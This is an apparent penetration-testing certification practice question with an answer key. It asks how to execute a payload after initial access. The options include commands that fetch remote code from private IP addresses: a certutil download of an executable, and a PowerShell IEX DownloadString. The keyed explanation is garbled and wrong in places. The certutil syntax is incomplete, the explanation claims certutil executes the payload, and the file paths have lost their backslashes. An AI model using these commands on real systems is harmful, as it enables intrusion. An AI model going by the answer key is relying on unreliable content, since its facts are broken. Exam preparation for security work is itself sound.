Which of the following commands should the penetration tester use?

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access.

Which of the following commands should the penetration tester use?
A . powershell.exe impo C:toolsfoo.ps1
B . certutil.exe -f https://192.168.0.1/foo.exe bad.exe
C . powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/")
D . rundll32.exe c:pathfoo.dll,functName

View Answer

Answer: B

Explanation:

To execute a payload and gain additional access, the penetration tester should use certutil.exe.

Here’s why:

Using certutil.exe:

Purpose: certutil.exe is a built-in Windows utility that can be used to download files from a remote server, making it useful for fetching and executing payloads.

Command: certutil.exe -f https://192.168.0.1/foo.exe bad.exe downloads the file foo.exe from the specified URL and saves it as bad.exe.

Comparison with Other Commands:

powershell.exe impo C:toolsfoo.ps1 (A): Incorrect syntax and not as direct as using certutil for downloading files.

powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/") (C): Incorrect syntax for downloading and executing a script.

rundll32.exe c:pathfoo.dll,functName (D): Used for executing DLLs, not suitable for downloading a payload.

Using certutil.exe to download and execute a payload is a common and effective method.